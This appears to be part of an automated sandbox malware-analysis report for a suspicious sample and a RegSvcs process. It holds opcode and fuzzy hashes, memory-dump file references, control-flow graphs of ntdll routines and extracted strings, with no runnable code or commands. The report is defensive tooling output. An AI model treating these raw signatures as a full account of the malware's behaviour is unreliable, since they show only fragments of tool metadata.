• Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction ID: b8a689fb5d1ad3d00f1c9ece3c92e7d479836d49cae4c88281db4ffb9473618a
• Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction Fuzzy Hash: 3D11D376504280CFCB16CF14D9C4B16BFB1FBA4318F24C6AED8490B656C336D85ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1977391889.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_bcd000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: ef193c23989a672774301ddfacf3d6ef58f1ad9d07919de1f80d830da878c468
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: B711DF76504240DFCB06CF00D9C4B16BFB1FB94324F24C2ADD9090B256C33AE85ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1990019617.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_248d000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: d244b8b9fd11107253b2eb838482bff2d51f57983ba1282528bdaacbf4d6e3d6
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: 0B11BB75904280DFCB02DF24C5C4B1ABBA1FB84318F24C6AAD8494F396C33AD44ACB62

                                                                                                              Execution Graph

                                                                                                               Execution Coverage: 0.1%
                                                                                                               Dynamic/Decrypted Code Coverage: 100%
                                                                                                               Signature Coverage: 0%
                                                                                                               Total number of Nodes: 1
                                                                                                               Total number of Limit Nodes: 0
                                                                                                              execution_graph 62075 ef2c1c LdrInitializeThunk

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 0 ef2c0a-ef2c0f 1 ef2c1f-ef2c26 LdrInitializeThunk 0->1 2 ef2c11-ef2c18 0->2
                                                                                                              APIs
                                                                                                              • LdrInitializeThunk.NTDLL(00F0FD4F,000000FF,00000024,00FA6634,00000004,00000000,?,-00000018,7D810F61,?,?,00EC8B12,?,?,?,?), ref: 00EF2C24
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: b009cc8668bd3ed680d5cdbda187cf568572214e66719fa3d2d7b8574a9c8477
                                                                                                              • Instruction ID: 17480c6f443d18187f374d7165e84a7cefe98dd459a3a99153ba629368802bfc
                                                                                                              • Opcode Fuzzy Hash: b009cc8668bd3ed680d5cdbda187cf568572214e66719fa3d2d7b8574a9c8477
                                                                                                              • Instruction Fuzzy Hash: F9B09B719019C5D5DB11E760460871B7900A7D0745F55C076D3430685F473CC5D1F175

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 4 ef2c1c-ef2c26 LdrInitializeThunk
                                                                                                              APIs
                                                                                                              • LdrInitializeThunk.NTDLL(00F0FD4F,000000FF,00000024,00FA6634,00000004,00000000,?,-00000018,7D810F61,?,?,00EC8B12,?,?,?,?), ref: 00EF2C24
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2f4707d6dd47ef9ae99bf1b64ba321172db030b0600b6487318bc7a262600052
                                                                                                              • Instruction ID: 2b14a1c6af583236b93b91df74e60e9d696c7ac477f80c1cc5d5decb2d01a822
                                                                                                              • Opcode Fuzzy Hash: 2f4707d6dd47ef9ae99bf1b64ba321172db030b0600b6487318bc7a262600052
                                                                                                              • Instruction Fuzzy Hash: 1CA00262509586A5C105A26448AD4459B14B9A119138DC38BD18745C5B5F1C0097B9B3

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 5 ef2df0-ef2dfc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              • LdrInitializeThunk.NTDLL(00F2E73E,0000005A,00F8D040,00000020,00000000,00F8D040,00000080,00F14A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,00EFAE00), ref: 00EF2DFA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 96fa63f81a1988009bbb4ae35df25fbb9a390d85da34d9d272797d22b6e97d74
                                                                                                              • Instruction ID: 20200a000333a19e4a8d3578e6451274fdc28c160dd7c972330afa92e75db843
                                                                                                              • Opcode Fuzzy Hash: 96fa63f81a1988009bbb4ae35df25fbb9a390d85da34d9d272797d22b6e97d74
                                                                                                              • Instruction Fuzzy Hash: FF90023130180463D21171588504707000987D0381FD5C423A082459CE9A5A8A53B121

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 6 ef35c0-ef35cc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 86b3b036ef9d69b998accca5141c25a3d63a73738d6a6f16f30aa1fc0e627060
                                                                                                              • Instruction ID: e1ac8ec367f4626988451d8f30a891703a73ff1af286b650e85cd1265fb05707
                                                                                                              • Opcode Fuzzy Hash: 86b3b036ef9d69b998accca5141c25a3d63a73738d6a6f16f30aa1fc0e627060
                                                                                                              • Instruction Fuzzy Hash: E190023170590452D20071588514706100587D0341FA5C422A08245ACE8B998A5275A2

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 7 42ee29-42ee2f 8 42ee31 7->8 9 42edc8-42edce 7->9 12 42ee33-42ee45 8->12 10 42edd0-42edd7 9->10 11 42edea-42edee 9->11 13 42edd9-42ede2 10->13 15 42ee4b-42ee52 12->15 13->13 14 42ede4-42ede9 13->14 16 42ee66-42ee69 15->16 17 42ee54-42ee56 15->17 17->16 18 42ee58-42ee64 call 42edf3 17->18 18->16
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0bd85229da903fbc9481f62a8f54e59b6c697e4c63c54f24657a10d75eb00789
                                                                                                              • Instruction ID: c40e740c81eec2e8b7a06381501afc2d45d636e991fdca20ea99b2323e295532
                                                                                                              • Opcode Fuzzy Hash: 0bd85229da903fbc9481f62a8f54e59b6c697e4c63c54f24657a10d75eb00789
                                                                                                              • Instruction Fuzzy Hash: 2DF0D127B0127167D620555B7C05A97BB6ACFC2A64B4900ABFA48EB301D469AC0082E4

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 33 42e923-42e964 call 42edf3 37 42e966-42e983 33->37 38 42e9be-42e9c3 33->38 40 42e996-42e9bb 37->40 41 42e985-42e98d 37->41 40->38 43 42e993 41->43 43->40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88e8f1c4df472a8417167208be93b0b50c212a591239faeca731d1d13e1655d0
                                                                                                              • Instruction ID: 29140e077c9d6363efc685f9344a9c90a4968142544a48ffa7a4c0b9c839e5c0
                                                                                                              • Opcode Fuzzy Hash: 88e8f1c4df472a8417167208be93b0b50c212a591239faeca731d1d13e1655d0
                                                                                                              • Instruction Fuzzy Hash: E801B9B1D0012866FB20EBD5DC42FDA73786B04705F5446DEA50CE6181EF7876888B59

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 21 42e920-42e93a 22 42e949-42e950 21->22 23 42e944 call 42edf3 21->23 24 42e95f-42e964 22->24 23->22 25 42e966-42e96f 24->25 26 42e9be-42e9c3 24->26 27 42e97e-42e983 25->27 28 42e996-42e9bb 27->28 29 42e985-42e98d 27->29 28->26 31 42e993 29->31 31->28
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 69ece9336c1e9b1aee075c9fb0da6218fbe15404a60b3460a0cacd0f4e0a3e98
                                                                                                              • Instruction ID: 04b9e68fb8965ea2c4d27a5fe8f18fc46a0f44bcf54aaa5cc54338073fd29f8f
                                                                                                              • Opcode Fuzzy Hash: 69ece9336c1e9b1aee075c9fb0da6218fbe15404a60b3460a0cacd0f4e0a3e98
                                                                                                              • Instruction Fuzzy Hash: 660192B1D0052866FB20EF95DC42FEA73B8AB04305F5446DEA50CE6181EB7866888B59

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 45 42ecc4 46 42ecc9-42ecfb 45->46 47 42ed01-42ed12 46->47
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ae2edd20352a1ad61482efaa2d96a3b44b9760b28c01e5775a2aec239a1651b
                                                                                                              • Instruction ID: a071dd11a00a9c90de2fefbb0e66054dab0ba5b02ba32aaa4d1ef8410196240c
                                                                                                              • Opcode Fuzzy Hash: 3ae2edd20352a1ad61482efaa2d96a3b44b9760b28c01e5775a2aec239a1651b
                                                                                                              • Instruction Fuzzy Hash: 7FF01271510209AFDB04CF69C881EEE77A8EB88360F048619FC29CB245D774E621CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 48 42ecd3-42ecfb 49 42ed01-42ed12 48->49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aa4371afe0688e425efbc913df122ad324937efed31953b7d488b72d7573f906
                                                                                                              • Instruction ID: 84694b756ef5616c5bedb289d21b3a53db4618e96811d42f516f0ab5cec2f1ac
                                                                                                              • Opcode Fuzzy Hash: aa4371afe0688e425efbc913df122ad324937efed31953b7d488b72d7573f906
                                                                                                              • Instruction Fuzzy Hash: C9F0AC76610209AFDB04CF59D881EEB77A9EB88750F04C519FD198B241D774EA25CBA0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 50 42ee33-42ee45 51 42ee4b-42ee52 50->51 52 42ee66-42ee69 51->52 53 42ee54-42ee56 51->53 53->52 54 42ee58-42ee64 call 42edf3 53->54 54->52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1284e8d9baa0d80b8643947f379561947c3df799f09bea5bc974c85c6469146e
                                                                                                              • Instruction ID: 705e7366df75f50f2d7a36b20794f5037f585fcb3c36eacfb974ea3f93f3414b
                                                                                                              • Opcode Fuzzy Hash: 1284e8d9baa0d80b8643947f379561947c3df799f09bea5bc974c85c6469146e
                                                                                                              • Instruction Fuzzy Hash: 9CE08072B5023477C530654B6C05F57775DCBC1F60F460016FE0897341D568AD0042E9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 57 42ed53-42ed63 58 42ed69-42ed6d 57->58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a74412573010063ad30df8e7c3dbac44f91774c43dafe5ce498322a5524ddc43
                                                                                                              • Instruction ID: 2c6511041599095c994ba1a69533891cabf7770030d69c3aa955075a383ab384
                                                                                                              • Opcode Fuzzy Hash: a74412573010063ad30df8e7c3dbac44f91774c43dafe5ce498322a5524ddc43
                                                                                                              • Instruction Fuzzy Hash: A3C08CB2A003087FDB00EE8DDC46F66339C9B08614F804049BA0C8B392E970FD5087A8

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 59 42ed50-42ed63 60 42ed69-42ed6d 59->60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6c78421f402c534d88d217095400eba8be619e0293668384ebcb3ef3bbbb603
                                                                                                              • Instruction ID: 18bbd9d0cd47f21f9b99e8bc6db3e812f0df4dbdb20a7c098c3edfdaaa88f3d9
                                                                                                              • Opcode Fuzzy Hash: e6c78421f402c534d88d217095400eba8be619e0293668384ebcb3ef3bbbb603
                                                                                                              • Instruction Fuzzy Hash: D9C080F19001142EE784BF51EC4AF9137188F45714F44018DF46D0F552D5167952C744

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 61 eca250-eca26f 62 eca58d-eca594 61->62 63 eca275-eca291 61->63 62->63 66 eca59a-f179bb 62->66 64 f179e6-f179eb 63->64 65 eca297-eca2a0 63->65 65->64 67 eca2a6-eca2ac 65->67 66->63 71 f179c1-f179c6 66->71 69 eca6ba-eca6bc 67->69 70 eca2b2-eca2b4 67->70 72 eca2ba-eca2bd 69->72 73 eca6c2 69->73 70->64 70->72 74 eca473-eca479 71->74 72->64 75 eca2c3-eca2c6 72->75 73->75 76 eca2c8-eca2d1 75->76 77 eca2da-eca2dd 75->77 78 f179cb-f179d5 76->78 79 eca2d7 76->79 80 eca6c7-eca6d0 77->80 81 eca2e3-eca32b 77->81 83 f179da-f179e3 call f3f290 78->83 79->77 80->81 82 eca6d6-f179ff 80->82 84 eca330-eca335 81->84 82->83 83->64 87 eca47c-eca47f 84->87 88 eca33b-eca343 84->88 89 eca34f-eca35d 87->89 90 eca485-eca488 87->90 88->89 92 eca345-eca349 88->92 94 eca48e-eca49e 89->94 95 eca363-eca368 89->95 90->94 96 f17a16-f17a19 90->96 92->89 93 eca59f-eca5a8 92->93 100 eca5aa-eca5ac 93->100 101 eca5c0-eca5c3 93->101 94->96 99 eca4a4-eca4ad 94->99 97 eca36c-eca36e 95->97 96->97 98 f17a1f-f17a24 96->98 105 f17a26 97->105 106 eca374-eca38c call eca6e0 97->106 107 f17a2b 98->107 99->97 100->89 102 eca5b2-eca5bb 100->102 103 f17a01 101->103 104 eca5c9-eca5cc 101->104 102->97 108 f17a0c 103->108 104->108 109 eca5d2-eca5d5 104->109 105->107 114 eca4b2-eca4b9 106->114 115 eca392-eca3ba 106->115 111 f17a2d-f17a2f 107->111 108->96 109->100 111->74 113 f17a35 111->113 116 eca3bc-eca3be 114->116 117 eca4bf-eca4c2 114->117 115->116 116->111 118 eca3c4-eca3cb 116->118 117->116 119 eca4c8-eca4d3 117->119 120 f17ae0 118->120 121 eca3d1-eca3d4 118->121 119->84 123 f17ae4-f17afc call f3f290 120->123 122 eca3e0-eca3ea 121->122 122->123 125 eca3f0-eca40c call eca840 122->125 123->74 129 eca5d7-eca5e0 125->129 130 eca412-eca417 125->130 131 eca601-eca603 129->131 132 eca5e2-eca5eb 129->132 130->74 133 eca419-eca43d 130->133 136 eca629-eca631 131->136 137 eca605-eca623 call eb4508 131->137 132->131 135 eca5ed-eca5f1 132->135 134 eca440-eca443 133->134 138 eca4d8-eca4dc 134->138 139 eca449-eca44c 134->139 140 eca5f7-eca5fb 135->140 141 eca681-eca6ab RtlDebugPrintTimes 135->141 137->74 137->136 146 f17a3a-f17a42 138->146 147 eca4e2-eca4e5 138->147 143 f17ad6 139->143 144 eca452-eca454 139->144 140->131 140->141 141->131 158 eca6b1-eca6b5 141->158 143->120 150 eca45a-eca461 144->150 151 eca520-eca539 call eca6e0 144->151 149 eca634-eca64a 146->149 153 f17a48-f17a4c 146->153 148 eca4eb-eca4ee 147->148 147->149 148->139 154 eca4f4-eca50c 148->154 149->154 159 eca650-eca659 149->159 155 eca57b-eca582 150->155 156 eca467-eca46c 150->156 169 eca65e-eca665 151->169 170 eca53f-eca567 151->170 153->149 160 f17a52-f17a5b 153->160 154->139 161 eca512-eca51b 154->161 155->122 164 eca588 155->164 156->74 162 eca46e 156->162 158->131 159->144 165 f17a85-f17a87 160->165 166 f17a5d-f17a60 160->166 161->144 162->74 164->120 165->149 171 f17a8d-f17a96 165->171 167 f17a62-f17a6c 166->167 168 f17a6e-f17a71 166->168 174 f17a81 167->174 175 f17a73-f17a7c 168->175 176 f17a7e 168->176 172 eca569-eca56b 169->172 173 eca66b-eca66e 169->173 170->172 171->144 172->156 178 eca571-eca573 172->178 173->172 177 eca674-eca67c 173->177 174->165 175->171 176->174 177->134 179 eca579 178->179 180 f17a9b-f17aa4 178->180 179->155 180->179 181 f17aaa-f17ab0 180->181 181->179 182 f17ab6-f17abe 181->182 182->179 183 f17ac4-f17acf 182->183 183->182 184 f17ad1 183->184 184->179
                                                                                                              Strings
                                                                                                              • SsHd, xrefs: 00ECA3E4
                                                                                                              • PR, xrefs: 00F17A73
                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00F179FA
                                                                                                              • PR, xrefs: 00F17A0C
                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 00F179D0, 00F179F5
                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00F179D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: PR$PR$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                              • API String ID: 0-2516949602
                                                                                                              • Opcode ID: 7e35c5d8d72fda6e1eabd9dabb183146607abd01cea88f154d921ff0ce97e40b
                                                                                                              • Instruction ID: 98d12e5b7c0d392afc6ae8109e3c393d2164290ad4d35803c7e2d74233bdb757
                                                                                                              • Opcode Fuzzy Hash: 7e35c5d8d72fda6e1eabd9dabb183146607abd01cea88f154d921ff0ce97e40b
                                                                                                              • Instruction Fuzzy Hash: B9E1C3716083058FD724CE28C594F6AB7E1BB8432CF18563DE8A5EB290D736DD86D782

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 185 ef2890-ef28b3 186 ef28b9-ef28cc 185->186 187 f2a4bc-f2a4c0 185->187 189 ef28ce-ef28d7 186->189 190 ef28dd-ef28df 186->190 187->186 188 f2a4c6-f2a4ca 187->188 188->186 191 f2a4d0-f2a4d4 188->191 189->190 192 f2a57e-f2a585 189->192 193 ef28e1-ef28e5 190->193 191->186 196 f2a4da-f2a4de 191->196 192->190 194 ef28eb-ef28fa 193->194 195 ef2988-ef298e 193->195 197 f2a58a-f2a58d 194->197 198 ef2900-ef2905 194->198 199 ef2908-ef290c 195->199 196->186 200 f2a4e4-f2a4eb 196->200 197->199 198->199 199->193 201 ef290e-ef291b 199->201 202 f2a564-f2a56c 200->202 203 f2a4ed-f2a4f4 200->203 204 f2a592-f2a599 201->204 205 ef2921 201->205 202->186 206 f2a572-f2a576 202->206 207 f2a4f6-f2a4fe 203->207 208 f2a50b 203->208 217 f2a5a1-f2a5c9 call f00050 204->217 210 ef2924-ef2926 205->210 206->186 211 f2a57c call f00050 206->211 207->186 212 f2a504-f2a509 207->212 209 f2a510-f2a536 call f00050 208->209 225 f2a55d-f2a55f 209->225 214 ef2928-ef292a 210->214 215 ef2993-ef2995 210->215 211->225 212->209 221 ef292c-ef292e 214->221 222 ef2946-ef2966 call f00050 214->222 215->214 219 ef2997-ef29b1 call f00050 215->219 234 ef2969-ef2974 219->234 221->222 228 ef2930-ef2944 call f00050 221->228 222->234 231 ef2981-ef2985 225->231 228->222 234->210 236 ef2976-ef2979 234->236 236->217 237 ef297f 236->237 237->231
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: `7
                                                                                                              • API String ID: 48624451-1189063315
                                                                                                              • Opcode ID: 9a66533acdb2815082f5a579f4e8a783a35a77b5b0d2b2e0dee3c02ebe4e815d
                                                                                                              • Instruction ID: d523337620a752ec4cdcbc389154dc484e9cbb65ec1511b9cbfb537816a243e9
                                                                                                              • Opcode Fuzzy Hash: 9a66533acdb2815082f5a579f4e8a783a35a77b5b0d2b2e0dee3c02ebe4e815d
